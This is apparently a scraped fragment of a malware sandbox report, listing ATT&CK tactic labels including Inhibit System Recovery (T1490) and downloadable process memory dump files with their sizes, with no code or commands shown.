Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/748-70-0x000007FEFBC51000-0x000007FEFBC53000-memory.dmp

Filesize
8KB

Download
memory/1088-68-0x00000000040A0000-0x00000000040A1000-memory.dmp

Filesize
4KB

Download
memory/1088-64-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/1088-61-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1088-108-0x00000000040C0000-0x00000000040C1000-memory.dmp

Filesize
4KB

Download
memory/1088-57-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1088-55-0x0000000001DE0000-0x000000000234D000-memory.dmp

Filesize
5.4MB

Download
memory/1088-58-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1088-56-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/1088-66-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/1088-63-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1088-65-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1088-62-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/1088-59-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1088-60-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1224-67-0x0000000001BC0000-0x0000000001BC5000-memory.dmp

Filesize
20KB

Download